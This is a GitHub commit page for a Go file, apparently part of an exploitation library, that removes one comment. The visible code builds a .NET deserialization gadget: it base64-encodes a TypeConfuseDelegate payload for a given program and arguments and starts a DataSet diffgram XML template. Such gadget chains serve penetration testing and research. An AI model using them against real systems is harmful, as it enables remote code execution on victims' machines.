Skip to content

Commit 5005f9d

Browse files
removed comment
1 parent b0cea13 commit 5005f9d

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

dotnet/dotnetgadget.go

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -133,7 +133,7 @@ func CreateDataSetXMLDiffGram(program string, args string, formatter string) (st
133133
b64String := make([]byte, base64.StdEncoding.EncodedLen(len(innerTypeConfuseDelegate)))
134134
base64.StdEncoding.Encode(b64String, []byte(innerTypeConfuseDelegate))
135135
innerTypeConfuseDelegateBase64 := string(b64String)
136-
// this is a placeholder for now... string1 will need to be replaced with the next gadget
136+
137137
string1 := `<diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1">
138138
<somedataset>
139139
<hehe diffgr:id="Table" msdata:rowOrder="0" diffgr:hasChanges="inserted">

0 commit comments

Comments
 (0)